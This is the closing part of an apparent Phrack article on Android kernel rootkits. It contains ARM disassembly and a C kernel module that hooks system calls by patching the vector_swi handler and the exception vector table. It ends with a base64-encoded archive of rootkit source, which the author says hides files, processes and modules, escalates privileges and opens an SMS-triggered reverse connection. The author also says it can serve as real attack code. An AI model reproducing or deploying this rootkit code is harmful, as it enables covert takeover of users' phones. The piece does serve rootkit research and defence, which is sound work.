r8, {sp, lr}^ 10: e14f8000 mrs r8, SPSR 14: e58de03c str lr, [sp, #60] 18: e58d8040 str r8, [sp, #64] 1c: e58d0044 str r0, [sp, #68] 20: e3a0b000 mov fp, #0 ; 0x0 24: e3180020 tst r8, #32 ; 0x20 28: 12877609 addne r7, r7, #9437184 2c: 051e7004 ldreq r7, [lr, #-4] [*]30: e59fc020 ldr ip, [pc, #32] ; 0x58 <__cr_alignment> 34: e59cc000 ldr ip, [ip] 38: ee01cf10 mcr 15, 0, ip, cr1, cr0, {0} 3c: f1080080 cpsie i 40: e1a096ad mov r9, sp, lsr #13 44: e1a09689 mov r9, r9, lsl #13 [*]48: e59f8000 ldr r8, [pc, #0] [*]4c: e59ff000 ldr pc, [pc, #0] [*]50: <hacked_sys_call_table address> [*]54: <vector_swi address to jmp> [*]58: <__cr_alignment routine address referring at 0x30> The asterisk parts are the codes modified or added to the original code. In addition to the part that we modified to make the code refer __cr_alignment function, I added some instructions to save address of sys_call_table copy version to r8 register, and jump back to the original vector_swi handler function. Following is the attack code written as a kernel module. static unsigned char new_vector_swi[500]; ... void make_new_vector_swi(){ void *swi_addr=(long *)0xffff0008; void *vector_swi_ptr=0; unsigned long offset=0; unsigned long *vector_swi_addr=0,orig_vector_swi_addr=0; unsigned long add_r8_pc_addr=0; unsigned long ldr_ip_pc_addr=0; int i; offset=((*(long *)swi_addr)&0xfff)+8; vector_swi_addr=*(unsigned long *)(swi_addr+offset); vector_swi_ptr=swi_addr+offset; /* 0xffff0420 */ orig_vector_swi_addr=vector_swi_addr; /* vector_swi's addr */ /* processing __cr_alignment */ while(vector_swi_addr++){ if(((*(unsigned long *)vector_swi_addr)& 0xfffff000)==0xe28f8000){ add_r8_pc_addr=(unsigned long)vector_swi_addr; break; } /* get __cr_alingment's addr */ if(((*(unsigned long *)vector_swi_addr)& 0xfffff000)==0xe59fc000){ offset=((*(unsigned long *)vector_swi_addr)& 0xfff)+8; ldr_ip_pc_addr=*(unsigned long *) ((char *)vector_swi_addr+offset); } } /* creating fake vector_swi handler */ memcpy(new_vector_swi,(char *)orig_vector_swi_addr, (add_r8_pc_addr-orig_vector_swi_addr)); offset=(add_r8_pc_addr-orig_vector_swi_addr); for(i=0;i<offset;i+=4){ if(((*(long *)&new_vector_swi[i])& 0xfffff000)==0xe59fc000){ *(long *)&new_vector_swi[i]=0xe59fc020; // ldr ip, [pc, #32] break; } } /* ldr r8, [pc, #0] */ *(long *)&new_vector_swi[offset]=0xe59f8000; offset+=4; /* ldr pc, [pc, #0] */ *(long *)&new_vector_swi[offset]=0xe59ff000; offset+=4; /* fake sys_call_table */ *(long *)&new_vector_swi[offset]=hacked_sys_call_table; offset+=4; /* jmp original vector_swi's addr */ *(long *)&new_vector_swi[offset]=(add_r8_pc_addr+4); offset+=4; /* __cr_alignment's addr */ *(long *)&new_vector_swi[offset]=ldr_ip_pc_addr; offset+=4; /* change the address of vector_swi handler within exception vector table */ *(unsigned long *)vector_swi_ptr=&new_vector_swi; return; } This code gets the address which processes the sys_call_table within vector_swi handler routine and then copies original contents of vector_swi to the fake vector_swi variable before the address we obtained. After changing some parts of fake vector_swi to make the code refer _cr_alignment function address correctly, we need to add instructions that save the address of sys_call_table copy version to r8 register and jump back to the original vector_swi handler function. Finally, hooking starts when we modify the address of vector_swi handler function within exception vector table. --[ 5.3 - Hooking techniques changing branch instruction offset The second hooking technique to change the branch instruction offset within exception vector table is that we don't change vector_swi handler and change the offset of 4 byte branch instruction code called automatically when the software interrupt occurs. 1. Proceed to step 4 like the way in section 5.1. 2. Store the address of generated fake vector_swi handler routine in the specific area within exception vector table. 3. Change 1 byte which is an offset of 4 byte instruction codes at 0xffff0008 and store. The code compared with section 5.2 is as follows. - *(unsigned long *)vector_swi_ptr=&new_vector_swi; ... + *(unsigned long *)(vector_swi_ptr+4)=&new_vector_swi; /* 0xffff0424 */ ... + *(unsigned long *)swi_addr+=4; /* 0xe59ff410 -> 0xe59ff414 */ The changed exception vector table after hooking is as follows. # ./coelacanth -e [000] ffff0000: ef9f0000 [Reset] ; svc 0x9f0000 branch code array [004] ffff0004: ea0000dd [Undef] ; b 0x380 [008] ffff0008: e59ff414 [SWI] ; ldr pc, [pc, #1044] ; 0x424 [00c] ffff000c: ea0000bb [Abort-perfetch] ; b 0x300 [010] ffff0010: ea00009a [Abort-data] ; b 0x280 [014] ffff0014: ea0000fa [Reserved] ; b 0x404 [018] ffff0018: ea000078 [IRQ] ; b 0x608 [01c] ffff001c: ea0000f7 [FIQ] ; b 0x400 [020] Reserved ... skip ... [420] ffff0420: c003df40 [vector_swi] [424] ffff0424: bf0ceb5c [new_vector_swi] ; fake vector_swi handler code Hooking starts when the address of a fake vector_swi handler code is stored at 0xffff0424 and the 4 byte branch instruction offset at 0xffff0008 changes the address around 0xffff0424 for reference. --[ 6 - Conclusion One more time, I thank many pioneers for their devotion and inspiration. I also hope various Android rootkit researches to follow. It is a pity that I couldn't cover all the ideas that occurred in my mind during writing this paper. However, I also think that it is better to discuss the advanced and practical techniques next time -if you like this one ;-)-. For more information, the attached example code provides not only file & process hiding and kernel module hiding features but also the classical rootkit features such as admin privilege succession to specific gid user and process privilege changing. I referred to the Defcon 18 whitepaper of Christian Papathanasiou and Nicholas J. Percoco for performing the reverse connection when we receive a sms message from an appointed phone number. Thanks to: vangelis and GGUM for translating Korean into English. Other than those who helped me on this paper, I'd like to thank my colleagues, people in my graduate school and everyone who knows me. --[ 7 - References [1] "Abuse of the Linux Kernel for Fun and Profit" by halflife [Phrack issue 50, article 05] [2] "Weakening the Linux Kernel" by plaguez [Phrack issue 52, article 18] [3] "RUNTIME KERNEL KMEM PATCHING" by Silvio Cesare [runtime-kernel-kmem-patching.txt] [4] "Linux on-the-fly kernel patching without LKM" by sd & devik [Phrack issue 58, article 07] [5] "Handling Interrupt Descriptor Table for fun and profit" by kad [Phrack issue 59, article 04] [6] "trojan eraser or i want my system call table clean" by riq [Phrack issue 54, article 03] [7] "yet another article about stealth modules in linux" by riq ["abtrom: anti btrom" in a mail to Bugtraq] [8] "Saint Jude, The Model" by Timothy Lawless [http://prdownloads.sourceforge.net/stjude/StJudeModel.pdf] [9] "IA32 ADVANCED FUNCTION HOOKING" by mayhem [Phrack issue 58, article 08] [10] "Android LKM Rootkit" by fred [http://upche.org/doku.php?id=wiki:rootkit] [11] "This is not the droid you're looking for..." by Trustwave [DEFCON-18-Trustwave-Spiderlabs-Android-Rootkit-WP.pdf] --[ 8 - Appendix: earthworm.tgz.uu I attach a demo code to demonstrate the concepts which I explained in this paper. This code can be used as a real code for attack or just a proof-of- concept code. I wish you use this code only for your study not for a bad purpose. <++> earthworm.tgz.uu begin-base64 644 earthworm.tgz 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 ==== <--> --[ EOF Sursa: http://www.phrack.org/issues.html?issue=68&id=6#article